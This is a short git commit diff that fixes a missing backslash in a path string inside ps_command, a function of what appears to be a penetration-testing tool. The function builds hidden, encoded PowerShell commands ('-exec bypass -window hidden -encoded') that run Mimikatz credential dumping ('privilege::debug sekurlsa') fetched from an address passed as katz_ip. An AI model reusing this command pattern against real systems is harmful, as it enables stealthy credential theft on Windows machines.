Added missing backslash

main
byt3bl33d3r 2015-10-08 12:59:48 -06:00
parent f216354515
commit e25ccc6c03
1 changed files with 1 additions and 1 deletions

View File

@ -2659,7 +2659,7 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl
""".format(addr=katz_ip, katz_command=katz_command)
if args.force_ps32:
command = 'IEX "$Env:windir\\SysWOW64\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}"'.format(b64encode(command.encode('UTF-16LE')))
command = 'IEX "$Env:windir\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}"'.format(b64encode(command.encode('UTF-16LE')))
base64_command = b64encode(command.encode('UTF-16LE'))